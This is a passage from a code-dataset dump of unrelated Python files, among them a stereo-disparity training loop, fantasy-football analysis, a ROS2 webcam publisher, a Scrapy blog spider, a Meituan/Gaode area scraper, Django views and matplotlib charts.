# # for a,b in v.items():\n # # print(a)\n # # for c,d in b.items():\n # # print(c,d) \n # exit()\n # #pre_dict=resnet34['optimizer_state']\n # opti_dict.update(pre_dict)\n # optimizer.load_state_dict(opti_dict)\n print('load success!')\n trained=0\n\n\n\n #best_error=5\n # it should be range(checkpoint[''epoch],args.n_epoch)\n for epoch in range(trained, args.n_epoch):\n #for epoch in range(0, args.n_epoch):\n \n #trained\n print('training!')\n model.train()\n for i, (left, right,disparity,image) in enumerate(trainloader):\n #with torch.no_grad():\n #print(left.shape)\n #print(torch.max(image),torch.min(image))\n start_time=time.time()\n left = left.cuda()\n right = right.cuda()\n disparity = disparity.cuda()\n mask = (disparity < 192) & (disparity >= 0)\n mask.detach_()\n optimizer.zero_grad()\n #print(P.shape)\n output1, output2, output3 = model(left,right)\n #print(output3.shape)\n output1 = torch.squeeze(output1, 1)\n output2 = torch.squeeze(output2, 1)\n output3 = torch.squeeze(output3, 1)\n # #outputs=outputs\n loss = 0.5 * F.smooth_l1_loss(output1[mask], disparity[mask],reduction='elementwise_mean') \\\n + 0.7 * F.smooth_l1_loss(output2[mask], disparity[mask], reduction='elementwise_mean') \\\n + F.smooth_l1_loss(output3[mask], disparity[mask], reduction='elementwise_mean')\n #loss=loss/2.2\n #output3 = model(left,right)\n\n #loss = F.smooth_l1_loss(output3[mask], disparity[mask], reduction='elementwise_mean')\n loss.backward()\n #parameters=model.named_parameters()\n optimizer.step()\n \n \n #torch.cuda.empty_cache()\n #print(loss.item)\n if args.visdom ==True:\n vis.line(\n X=torch.ones(1).cpu() * i+torch.ones(1).cpu() *(epoch-trained)*5457,\n Y=loss.item()*torch.ones(1).cpu()/2.2,\n win=loss_window,\n update='append')\n #print(torch.max(output3).item(),torch.min(output3).item())\n if i%15==0:\n #print(output3.shape)\n pre = output3.data.cpu().numpy().astype('float32')\n pre = pre[0,:,:]\n #print(np.max(pre))\n #print(pre.shape)\n pre = np.reshape(pre, [256,512]).astype('float32')\n vis.image(\n pre,\n opts=dict(title='predict!', caption='predict.'),\n win=pre_window,\n )\n\n ground=disparity.data.cpu().numpy().astype('float32')\n ground = ground[0, :, :]\n ground = np.reshape(ground, [256,512]).astype('float32')\n vis.image(\n ground,\n opts=dict(title='ground!', caption='ground.'),\n win=ground_window,\n )\n image=image.data.cpu().numpy().astype('float32')\n image = image[0,...]\n #image=image[0,...]\n #print(image.shape,np.min(image))\n image = np.reshape(image, [3,256,512]).astype('float32')\n vis.image(\n image,\n opts=dict(title='image!', caption='image.'),\n win=image_window,\n ) \n loss_rec.append(loss.item())\n print(time.time()-start_time)\n print(\"data [%d/5457/%d/%d] Loss: %.4f\" % (i, epoch, args.n_epoch,loss.item()/2.2))\n\n state = {'epoch': epoch+1,\n 'model_state': model.state_dict(),\n 'optimizer_state': optimizer.state_dict(),\n }\n np.save('loss.npy',loss_rec)\n torch.save(state, \"{}_{}_{}_best_model.pkl\".format(\n epoch,args.arch, args.dataset)) \n #exit()\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Hyperparams')\n parser.add_argument('--arch', nargs='?', type=str, default='bilinear_cmf_sub_8',\n help='Architecture to use [\\'region support network\\']')\n parser.add_argument('--dataset', nargs='?', type=str, default='flying3d',\n help='Dataset to use [\\'sceneflow and kitti etc\\']')\n parser.add_argument('--img_rows', nargs='?', type=int, default=480,\n help='Height of the input image')\n parser.add_argument('--img_cols', nargs='?', type=int, default=640,\n help='Width of the input image')\n parser.add_argument('--n_epoch', nargs='?', type=int, default=4000,\n help='# of the epochs')\n parser.add_argument('--batch_size', nargs='?', type=int, default=4,\n help='Batch Size')\n parser.add_argument('--l_rate', nargs='?', type=float, default=1e-3,\n help='Learning Rate')\n parser.add_argument('--feature_scale', nargs='?', type=int, default=1,\n help='Divider for # of features to use')\n parser.add_argument('--resume', nargs='?', type=str, default=None,\n help='Path to previous saved model to restart from /home/lidong/Documents/PSSM/rstereo_sceneflow_best_model.pkl')\n parser.add_argument('--visdom', nargs='?', type=bool, default=True,\n help='Show visualization(s) on visdom | False by default')\n args = parser.parse_args()\n train(args)\n","sub_path":"back of code/CMF/train-20181113162613.py","file_name":"train-20181113162613.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"176862608","text":"import cudf as dd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndf = dd.read_csv(\"players_raw.csv\")\ndf = df[['first_name', 'second_name', 'id', 'total_points', 'team_code', 'now_cost', 'minutes', 'element_type', 'status']]\ndf2 = dd.read_csv(\"teams.csv\")\ndf2 = df2[['code', 'name']]\ndf2['team_code'] = df2['code']\ndel df2['code']\ndf3 = dd.merge(df,df2, on='team_code')\nteams = df3['name'].unique()\ntotal_team_points = []\ntotal_team_values = []\nfor t in teams:\n total_team_point = df3[df3['name'] == t]['total_points'].sum()\n total_team_points.append(total_team_point)\n total_team_value = df3[df3['name'] == t]['now_cost'].sum()\n total_team_values.append(total_team_value)\n\ndf4 = dd.DataFrame()\ndf4['team_name'] = teams\ndf4['total_fantasy_points'] = total_team_points\ndf4['total_team_value'] = total_team_values\n\ntotal_players_frequenty_play = []\nteam_roi = []\nfor t in teams:\n total_team_point = df4[df4['team_name'] == t]['total_fantasy_points'][0]\n total_team_value = df4[df4['team_name'] == t]['total_team_value'][0]\n roi = total_team_point / total_team_value\n team_roi.append(roi)\n total_p_play_lot = df3[(df3['name'] == t) & (df3['minutes'] > 360)]['id'].count()\n total_players_frequenty_play.append(total_p_play_lot)\n\ndf4['roi'] = team_roi\ndf4['total_players'] = total_players_frequenty_play\n\nplayer_roi = []\nplayer_name = []\nplayer_team = []\nplayer_position = []\nplayer_price = []\nfor p in df3['id']:\n player_points = df3[df3['id'] == p]['total_points'][0]\n player_value = df3[df3['id'] == p]['now_cost'][0]\n roi = player_points / player_value\n player_roi.append(roi)\n player_name.append(df3[df3['id'] == p]['first_name'][0] + df3[df3['id'] == p]['second_name'][0])\n player_team.append(df3[df3['id'] == p]['name'][0])\n player_position.append(df3[df3['id'] == p]['element_type'][0])\n player_price.append(player_value)\n\n\ndf5 = dd.DataFrame()\ndf5['player_name'] = player_name\ndf5['player_roi'] = player_roi\ndf5['player_team'] = player_team\ndf5['player_pos'] = player_position\ndf5['player_value'] = player_price\n\ndf5 = df5.sort_values('player_roi', ascending=False)\n\ndf5.head(50).to_csv(\"top_50.csv\")\ndf5.tail(50).to_csv(\"worst_50.csv\")\n\nn_groups = len(teams)\n\n# create plot\nfig, ax = plt.subplots(figsize=(16,8))\nindex = np.arange(n_groups)\nbar_width = 0.35\nopacity = 0.8\n\nrects1 = plt.bar(index, df4['total_fantasy_points'], bar_width,\nalpha=opacity,\ncolor='b',\nlabel='Total Fantasy Point')\n\nrects2 = plt.bar(index + bar_width, df4['total_team_value'], bar_width,\nalpha=opacity,\ncolor='g',\nlabel='Total Team Cost')\n\nplt.xlabel('Team')\nplt.ylabel('Value')\nplt.xticks(index + bar_width, teams)\nplt.xticks(rotation=70)\nplt.legend()\n\nplt.show()\n\nn_groups = len(teams)\n\n# create plot\nfig, ax = plt.subplots(figsize=(16,8))\nindex = np.arange(n_groups)\nbar_width = 0.35\nopacity = 0.8\n\nrects1 = plt.bar(index, df4['roi'], bar_width,\nalpha=opacity,\ncolor='g',\nlabel='Team ROI')\n\nrects2 = plt.bar(index + bar_width, df4['total_players'], bar_width,\nalpha=opacity,\ncolor='r',\nlabel='Total Players That Play More Than 360 Minutes')\n\nplt.xlabel('Team')\nplt.ylabel('Value')\nplt.xticks(index + bar_width, teams)\nplt.xticks(rotation=70)\nplt.legend()\n\nplt.show()\n\nplt.scatter(df3['now_cost'], df3['total_points'] , c='black', alpha=1)\nplt.title('Player Cost Vs Player Points')\nplt.xlabel('Cost (million)')\nplt.ylabel('Total Points')\nplt.axhline(y=100, color='r', linestyle='-')\nplt.axvline(x=80, color='r', linestyle='-')\nplt.show()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"349922867","text":"from ocdskit.commands.base import OCDSCommand\n\n\nclass Command(OCDSCommand):\n name = 'split-release-packages'\n help = 'reads release packages from standard input, and prints many release packages for each'\n\n def add_arguments(self):\n self.add_argument('size', type=int, help='the number of releases per package')\n\n def handle(self):\n # See exploration of not reading each input into memory: https://github.com/open-contracting/ocdskit/issues/118\n for package in self.items():\n releases = package['releases']\n\n for i in range(0, len(releases), self.args.size):\n package.update(releases=releases[i:i + self.args.size])\n\n self.print(package)\n","sub_path":"ocdskit/commands/split_release_packages.py","file_name":"split_release_packages.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"125973084","text":"from vehicle import *\nfrom customer import *\n\nclass Employee(object):\n emp_id=0\n\n def __init__(self, name):\n self.__name=name\n self.__id=Employee.emp_id\n Employee.emp_id += 1\n\n def __str__(self):\n return '%s is of type %s'%(self.__name,self.get_title())\n ######## CODE MISSING HERE\n\n def get_name(self):\n return self.__name\n\n \n def get_title(self):\n return 'Subordinate'\n ######## CODE MISSING HERE\n \nclass Manager(Employee):\n\n def get_title(self):\n return 'Manager'\n ######## CODE MISSING HERE\n\n def get_sales_report(self,salesman):\n try:\n print('%s current cumulative sales %d'%(salesman.get_name(),salesman.sales[salesman]))\n except KeyError as err:\n print('KeyError: salesman doesnt have any sales jet')\n ######## CODE MISSING HERE\n\nclass Salesman(Employee):\n\n sales={}\n\n def sale(self,vehicle,sales_price,customer):\n if customer.credit_score()==True:\n if self in Salesman.sales:\n Salesman.sales[self] += sales_price\n else:\n Salesman.sales[self]=sales_price\n else:\n print('Customer does not have enough credit score')\n\n\n\n### test cases ###\n\n## initialising employee instances\n\nEric = Manager(\"Eric\")\nKyle = Employee(\"Kyle\")\nStan = Salesman(\"Stan\")\nKenny = Salesman(\"Kenny\")\nCraig = Salesman(\"Craig\")\n\n## printing employee instances\n\nprint(Eric) # expected output: Employee: Eric is of type Manager\nprint(Kyle) # expected output: Employee: Kyle is of type Subordinate\nprint(Stan) # expected output: Employee: Stan is of type Subordinate\nprint(Kenny) # expected output: Employee: Kenny is of type Subordinate\nprint(Craig) # expected output: Employee: Craig is of type Subordinate\n\n\n## registering sales\n\nKenny.sale(Veh2,6000,Heidi)\n\nStan.sale(Veh1,9000,Wendy)\n\n\n## printing an individual sales report:\nprint(Kenny)\n#print(Salesman.sales)\n\nEric.get_sales_report(Kenny)\nEric.get_sales_report(Stan)\n# expected output:\n# Kenny's current cumulative sales:\n# 6000\n\n\n","sub_path":"employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"541545031","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nbscuda_exec = [0.45, 0.81, 1.58, 3.16]\nbscuda_xfer = [7.82, 14.44, 27.35, 53.38]\nbspara_gpu_exec = [0.52, 0.96, 1.98, 3.76]\nbspara_xfer = [7.69, 14.16, 26.91, 52.91]\nbspara_interp = [3.95, 4.12, 4.29, 4.79]\nbspara_init = [1.66, 1.80, 1.53, 1.40]\nbspara_ptxcomp = [7.09, 7.17, 6.81, 6.77]\n\nfor i in range(4):\n bspara_interp[i] -= bspara_init[i]\n\nN = 4\nopts = np.arange(N)\nwidth = 0.35\nspace = 0.1\n\ncolor1 = 'blue'\nhatch1 = \"\\\\\"\ncolor2 = 'red'\nhatch2 = '//'\n\nfig = plt.figure()\nax = fig.add_subplot(111)\ncudRects1 = ax.bar(opts, bscuda_xfer, width, color=color1,\n hatch=hatch1)\nparRects1 = ax.bar(opts+width+space, bspara_xfer, width, color=color1,\n hatch=hatch1)\n\ncudRects2 = ax.bar(opts, bscuda_exec, width, color=color2,\n bottom=bscuda_xfer, hatch=hatch2)\nparRects2 = ax.bar(opts+width+space, bspara_gpu_exec, width, color=color2,\n bottom=bspara_xfer, hatch=hatch2)\n\nnpbspara_gpu_exec = np.array(bspara_gpu_exec)\nnpbspara_xfer = np.array(bspara_xfer) + npbspara_gpu_exec\nparRects3 = ax.bar(opts+width+space, bspara_interp, width, color='brown',\n bottom=npbspara_xfer)\n\nnpbspara_interp = np.array(bspara_interp) + npbspara_xfer\nparRects4 = ax.bar(opts+width+space, bspara_init, width, color='yellow',\n bottom=npbspara_interp, hatch='|')\n\nnpbspara_init = np.array(bspara_init) + npbspara_interp\nparRects5 = ax.bar(opts+width+space, bspara_ptxcomp, width, color='green',\n bottom=npbspara_init, hatch='x')\n\n\nax.set_xlabel('Number Of Options')\nax.set_ylabel('Time In Milliseconds')\nax.set_title('GPU Black-Scholes Execution Time')\nax.set_xticks(opts+(0.5*space+width))\nax.set_xticklabels(('1M', '2M', '4M', '8M'))\nax.set_yticks(np.arange(0, 100, 10))\n\nax.legend((cudRects1[0], cudRects2[0],\n parRects3[0], parRects4[0], parRects5[0]),\n ('Data Transfer Time', 'Execution Time', 'Interpreter',\n 'Initialization', 'PTX Compilation'), loc='upper left')\n\ndef autolabel(rects, title):\n for rect in rects:\n height = rect.get_y() + rect.get_height()\n ax.text(rect.get_x()+rect.get_width()/2., 3.0+height, title,\n ha='center', va='bottom')\n\nautolabel(cudRects2, 'CUDA')\nautolabel(parRects5, 'Parakeet')\n\nplt.show()\n\n","sub_path":"papers/ICFP11/bs_nocpu.py","file_name":"bs_nocpu.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52293872","text":"import rclpy\nfrom rclpy.node import Node\nimport cv2\nimport numpy as np\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\n\nclass Webcam_cap: \n def __init__(self): \n self.cam = cv2.VideoCapture(0) # video capturing from the camera, default cam number is 0\n self.cam.set(3,640)\n self.cam.set(4,480)\n \n def Capture_Frame(self): \n _, self.img = self.cam.read() # Defining our image\n return self.img \n\nclass Campublisher(Node):\n \n def __init__(self):\n super().__init__('Cam_publisher')\n self.publisher = self.create_publisher(Image, 'camera_msg', 1000)\n self.timer = self.create_timer(0.01, self.timer_callback)\n self.obj = Webcam_cap()\n self.bridge = CvBridge()\n print(\"webcam running....\")\n\n def timer_callback(self):\n pub_frames = self.obj.Capture_Frame()\n msg = self.bridge.cv2_to_imgmsg(pub_frames) \n self.publisher.publish(msg)\n\ndef main():\n rclpy.init()\n node = Campublisher()\n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n pass \n node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__': \n main()\n\n","sub_path":"src/python_turtle/python_turtle/webcam_pub.py","file_name":"webcam_pub.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"92453934","text":"from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.selector import HtmlXPathSelector\n\nfrom blackwidow.items import HeelsItem\n\n\nclass SayHelloMaxSpider(CrawlSpider):\n\n name = 'sayhellomax'\n allowed_domains = ['sayhellomax.com', ]\n start_urls = ['http://www.sayhellomax.com/', ]\n\n rules = (\n # find next page\n Rule(\n SgmlLinkExtractor(\n allow=(r'search\\?updated-max=', ), # http://www.sayhellomax.com/search?updated-max=2013-10-21T08:00:00-07:00&max-results=10\n restrict_xpaths=('//a[@id=\"Blog1_blog-pager-older-link\"]', ),\n unique=True,\n ),\n follow=True,\n ),\n\n # find detail page then parse it\n Rule(\n SgmlLinkExtractor(\n allow=(r'\\d+/\\d+/[\\w-]+.html', ), # http://www.sayhellomax.com/2013/11/bundled.html\n restrict_xpaths=('//div[@id=\"Blog1\"]//div[contains(@class, \"blog-posts\")]', ),\n unique=True,\n ),\n callback='parse_post_detail',\n ),\n )\n\n def parse_post_detail(self, response):\n \"\"\"\n Scrapy creates scrapy.http.Request objects for each URL in the\n start_urls attribute of the Spider, and assigns them the parse method\n of the spider as their callback function.\n \"\"\"\n\n hxs = HtmlXPathSelector(response)\n\n item = HeelsItem()\n\n item['comment'] = hxs.select('//title/text()').extract()\n item['image_urls'] = hxs.select('//div[contains(@class, \"post\")]//div[contains(@class, \"post-body\")]//img/@src').extract()\n item['source_url'] = response.url\n\n return item\n","sub_path":"blackwidow/spiders/sayhellomax.py","file_name":"sayhellomax.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"497545382","text":"import sys\nimport os\nsys.path.append('../')\nfrom Unet.data_Keras import Augmentation, DataProcess\n\nmydata = DataProcess(512, 1024)\nmydata.write_img_to_tfrecords()\naug = Augmentation()\naug.augmentation()\naug.split_merge()\nos.system('python3 unet-TF-withBatchNormal.py')\n","sub_path":"Unet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134690975","text":"import requests\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport codecs\r\nfrom openpyxl import Workbook\r\n\r\n# 从美团API中获取城市url\r\ndef get_url_from_api(city_name):\r\n url = \"https://apimobile.meituan.com/group/v1/area/search/\"\r\n res = requests.get(url + city_name).text\r\n res = json.loads(res)\r\n if len(res['data']) == 0:\r\n return 0\r\n else:\r\n acronym = res['data'][0]['cityAcronym']\r\n if len(acronym) == 0:\r\n return 0\r\n else:\r\n return [('https://' + acronym + '.meituan.com/meishi/'), city_name]\r\n\r\n# 从本地json文件从获取城市url\r\ndef get_url_from_json(city_name):\r\n if os.path.exists('city.json') == True:\r\n file = open('city.json', 'r').read()\r\n city_json = json.loads(file)\r\n if city_json.__contains__(city_name):\r\n return [city_json[city_name], city_name]\r\n else:\r\n return 0\r\n else:\r\n return 0\r\n\r\n# 获取商圈数据\r\ndef get_area_data(url):\r\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'}\r\n html = requests.get(url[0], headers=headers).text\r\n if len(html) == 0:\r\n print('未找到该城市的商圈信息')\r\n return 0\r\n else:\r\n html = BeautifulSoup(html, \"html.parser\").find_all('script')\r\n city_json = '' # 存放包含商圈信息的json字符串\r\n for i in html:\r\n i = str(i.string)\r\n if i.find('window._appState') != -1:\r\n city_json = i\r\n break\r\n city_json = city_json[19:-1] # 去除首位不需要的字符,仅保留json数据\r\n city_json = json.loads(city_json)\r\n city_json = city_json['filters']['areas']\r\n return [city_json, url[1]]\r\n\r\n# 处理数据 json=>txt\r\ndef process_data(data):\r\n res = \"\"\r\n for key, i in enumerate(data[0]):\r\n res += i['name'] + \"\\n\"\r\n for j in data[0][key]['subAreas']:\r\n if j['name'] != '全部':\r\n res += data[1] + j['name'] + \"\\n\"\r\n return res\r\n\r\n\r\ndef init():\r\n city = codecs.open('city_area.txt', 'r', 'UTF-8')\r\n while True:\r\n city_name = city.readline().strip()\r\n if not city_name:\r\n city.close()\r\n break\r\n # city_name = city_line\r\n url = get_url_from_json(city_name)\r\n if url == 0:\r\n url = get_url_from_api(city_name)\r\n if url == 0:\r\n print(\"输入的城市名有误,请重新输入\")\r\n init()\r\n data = get_area_data(url)\r\n if data != 0:\r\n data = process_data(data)\r\n print(data)\r\n file = open('city_area_' + city_name + '.txt', 'w', encoding='UTF-8')\r\n file.write(data)\r\n file.close()\r\n f = codecs.open('city_area_' + city_name + '.txt', 'r', 'UTF-8')\r\n i = 0\r\n\r\n wb = Workbook()\r\n sheet = wb.active\r\n sheet.title = \"trade_area\"\r\n\r\n def get_location(address, i):\r\n print(i)\r\n url = \"http://restapi.amap.com/v3/geocode/geo\"\r\n data = {\r\n 'key': 'xxxx', # 在高德地图开发者平台申请的key,需要替换为自己的key\r\n 'address': address\r\n }\r\n r = requests.post(url, data=data).json()\r\n sheet[\"A{0}\".format(i)].value = address.strip('\\n')\r\n print(r)\r\n if r['status'] == '1':\r\n if len(r['geocodes']) > 0:\r\n GPS = r['geocodes'][0]['location']\r\n sheet[\"B{0}\".format(i)].value = '[' + GPS + ']'\r\n else:\r\n sheet[\"B{0}\".format(i)].value = '[]'\r\n else:\r\n sheet[\"B{0}\".format(i)].value = '未找到'\r\n # 将地址信息替换为自己的文件,一行代表一个地址,根据需要也可以自定义分隔符\r\n\r\n while True:\r\n line = f.readline()\r\n i = i + 1\r\n if not line:\r\n f.close()\r\n wb.save('city_area_gps_' + city_name + '.xlsx')\r\n break\r\n get_location(line, i)\r\n\r\nif __name__ == '__main__':\r\n init()\r\n\r\n","sub_path":".py/get_trade_area_and_gps.py","file_name":"get_trade_area_and_gps.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"478739377","text":"\"\"\"\n\npython3 store.py\nThe Dugout\n 1. Running\n 2. Baseball\n 3. Basketball\n 4. Exit\nSelect the number of a department\n\nAttributes:\n-name\n-departments\n\nOptional Extra Attributes:\n-Store hours\n-Store Capacity\n\"\"\"\n\nfrom departments import Department\n\nclass Store:\n # hours = 12\n\n def __init__(self, name, departments):\n self.name = name\n self.departments = []\n\n for dep in departments:\n department = Department(dep)\n self.departments.append(department)\n\n # def __str__(self): #String is for readability\n # return f'Store name is {self.name}'\n\n # def __repr__(self): #representation is for testing/debugging\n # return f'Store name is {self.name}'\n\n def __str__(self):\n output = \"\"\n\n for index, department in enumerate(self.departments):\n output += str(index + 1) + \". \" + str(department) +\"\\n\"\n \n output += str(len(self.departments) + 1) + \". Exit\"\n \n return output\n\n\n\n\nstore = Store(\"The Dugout\", [\"Running\", \"Basketball\", \"Baseball\", \"Fencing\"])\n\nprint(store)\n\nselection = 0\n\nwhile selection != len(store.departments) + 1:\n selection = input(\"Select a number of a department. \")\n try:\n selection = int(selection)\n if selection >= 1 and selection < len(store.departments) + 1:\n print(f\"the user selected: {selection}\")\n else:\n print(\"Choose from the given choices\")\n except ValueError:\n print(f\"Choose a number\")\n\nprint(f\"Thank You for Shopping with Us Today :)\")","sub_path":"src/stores.py","file_name":"stores.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"421381852","text":"import numpy as np\nimport cv2\nimport random\n\n\nimg = cv2.imread(r'C:\\Users\\varun\\Coding\\python_practice\\Project_pie\\template.png',1)\n# Image is as a numpy array\n\n# Image has to be grayscale for cv2.threshold()\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nret, img_modified = cv2.threshold(img, 120, 255, cv2.THRESH_TOZERO) \ncv2.imshow('hello',img_modified)\n\n# Getting shape of image\nh, w = img.shape\n\nprint(\"Max number of random pixel sampling =\",h*w)\nprint(\"Give number of test cases(<10000) and number of random pixel sampling.\")\nn, iterations = [int(x) for x in input().split(' ')]\n\nprint(\"---- Ok wait ----\")\n# Gets the black pixel ratio for the 100 test cases \niteration_list = []\n\n# Keeps track of different colours\ncolour_list = {}\n\n# Makes sure no repeatation of pixel co=ordinates(in the inner samples)\ncheck_list = []\n\n# Count of black and white pixel in the random sampling\n\n# # 100 test cases\n# for _ in range(n) :\n \n# # Getting \"iteration\" number of pixels\n# for i in range(iterations):\n# # Random pixel values\n# x = random.randint(0,h-1)\n# y = random.randint(0,w-1)\n\n# # Ensuring no repeatation of pixels\n# if [x,y] not in check_list : \n# if img[x,y] == 0 :\n \n# else :\n \n\n# else :\n# i -= 1\n\n# # Appending black pixel to total value to the list\n# ratio_black = float(\"{:.5f}\".format(count_black/(count_black+count_white)))\n# iteration_list.append(ratio_black)\n \n# # Final calculations\n# mean_ratio_black = sum(iteration_list)/n\n# print(\"Percentage of black : %0.5f\"%(mean_ratio_black*100))\n# print(\"Total black pixel : %d/%d\"%(mean_ratio_black*(h*w),(h*w)))","sub_path":"Project_pie/Monte_Carlo_colour.py","file_name":"Monte_Carlo_colour.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"452405953","text":"from django.views.generic import ListView, DetailView\nfrom django.http import Http404\nfrom django.shortcuts import render, get_object_or_404\n\nfrom .models import Damage\nfrom .forms import DamageForm\n\n# ----------------- list view ------------------------\n\ndef damage_list_view(request):\n queryset = Damage.objects.all()\n context = {\n 'title': ' Damages',\n 'object_list': queryset\n }\n return render(request, \"damages/list.html\", context)\n\n\n# ---------------- detail View ---------------------------\n\ndef damage_detail_view(request, pk=None, *args, **kwargs):\n instance = Damage.objects.get_by_id(pk)\n if instance is None:\n raise Http404(\"Damage does not Exsist!\")\n context = {\n 'title': 'Damage Details',\n 'object': instance\n }\n return render(request, \"damages/detail.html\", context)\n\n # --------------- Create damage ---------------------------\ndef damage_create_view(request):\n form = DamageForm(request.POST or None)\n if form.is_valid():\n form.save()\n form = DamageForm()\n\n context = {\n 'form' : form,\n }\n return render(request, 'damages/damage-new.html', context)","sub_path":"damages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"582084842","text":"# picturing\r\n# ABANDONDED.\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport glob\r\nimport math\r\nimport matplotlib as mpl\r\nfrom matplotlib.font_manager import FontProperties\r\nzhfont = FontProperties(fname=\"/usr/share/fonts/cjkuni-ukai/ukai.ttc\") # 图片显示中文字体\r\nmpl.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport pickle\r\n\r\nfrom toolkitJ import cell2dmatlab_jsp\r\nwith open('res.pickle', 'rb') as f:\r\n res = pickle.load(f)\r\n\r\nprint(res)\r\n\r\nprint(len(res))\r\n#\r\nL = len(res)\r\n\r\nft_size = 24\r\n\r\n\r\nxlbl = cell2dmatlab_jsp([L], 1, [])\r\ny = np.zeros((6, L))\r\nfor i in range(L):\r\n xlbl[i] = res[i][1]\r\n for j in range(6):\r\n y[j][i] = res[i][3][j]\r\n\r\nxlbl = ['LSVM', 'LDA', 'QDA', 'NB', 'ADAB', 'LRC', 'DT', 'RF']\r\nylbl = ['P(Precision)', 'A(Accuracy)', 'R(Recall)', 'MA(Missing Alert)', 'FA(False Alert)', 'F1(F1 score)']\r\nx = np.arange(1, 9)\r\nh = plt.figure(num=str(j), figsize=(17, 9.3))\r\nax = plt.gca()\r\nport = 0.1\r\nytick = np.arange(0, 1, 0.2)\r\ncolorlist = ['blue', 'green', 'yellow', 'yellowgreen', 'purple', 'red']\r\nfor j in range(6):\r\n # plt.subplot(3, 2, j + 1)\r\n delt = port * j + 0.01 * j\r\n plt.bar(x - 0.3 + delt, y[j], width=port, facecolor=colorlist[j], label=ylbl[j])\r\n\r\n plt.legend(mode=\"expand\", loc=2, fontsize=ft_size)\r\n ax.set_xticks(x)\r\n ax.set_xticklabels(xlbl, fontproperties=zhfont, fontsize=ft_size)\r\n ax.set_yticklabels(ytick, fontsize=ft_size)\r\n # plt.xlabel('Classifiers')\r\n plt.ylabel('scores', fontsize=ft_size)\r\n # plt.title(ylbl[j])\r\n plt.ylim((0, 1))\r\n plt.show()\r\n plt.savefig('/home/GaoMY/EXECUTION/NFDA/code/python_backup/pic/e.png')\r\n\r\n\r\nh2 = plt.figure(num=str(j), figsize=(17, 9.3))\r\n\r\n\r\nfor j in range(6):\r\n plt.subplot(3, 2, j + 1)\r\n ax = plt.gca()\r\n plt.bar(x, y[j], label=ylbl[j])\r\n plt.legend(loc='best')\r\n ax.set_xticks(x)\r\n if j > 3:\r\n ax.set_xticklabels(xlbl, fontproperties=zhfont, fontsize=ft_size)\r\n else:\r\n ax.set_xticklabels([], fontproperties=zhfont, fontsize=ft_size)\r\n\r\n ax.set_yticklabels(ytick, fontsize=ft_size)\r\n # plt.xlabel('Classifiers')\r\n plt.ylabel('scores', fontsize=ft_size)\r\n plt.title(ylbl[j], fontsize=ft_size)\r\n plt.ylim((0, 1))\r\n plt.show()\r\n plt.savefig('/home/GaoMY/EXECUTION/NFDA/code/python_backup/pic/SPR.png')\r\n","sub_path":"WORKFLOW/code/python_code/picturing.py","file_name":"picturing.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"591793228","text":"import os\r\nimport numpy as np\r\nimport xml.etree.ElementTree as ET\r\npath = r\"/media/shuhao/harddisk1/data/Annotations/train/\"\r\n\r\nfiles = os.listdir(path)\r\nnum=0\r\nfor xml in files:\r\n xml_path=path+xml\r\n print(xml_path)\r\n tree = ET.parse(xml_path)\r\n root = tree.getroot()\r\n objects = root.findall('object')\r\n for object in objects:\r\n object_name = object.find('name').text\r\n if object_name=='\\\\':\r\n object.find('name').text='ggp'\r\n num += 1\r\n print(xml_path)\r\n tree.write(xml_path)\r\nprint(num)","sub_path":"data_tools/xml替换.py","file_name":"xml替换.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"18369560","text":"__author__ = 'briansmith'\n\n#!/usr/bin/env python\n\nimport argparse, textwrap\n\nparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description = textwrap.dedent('''\\\n Author: Brian A. Smith\n University of Arizona\n 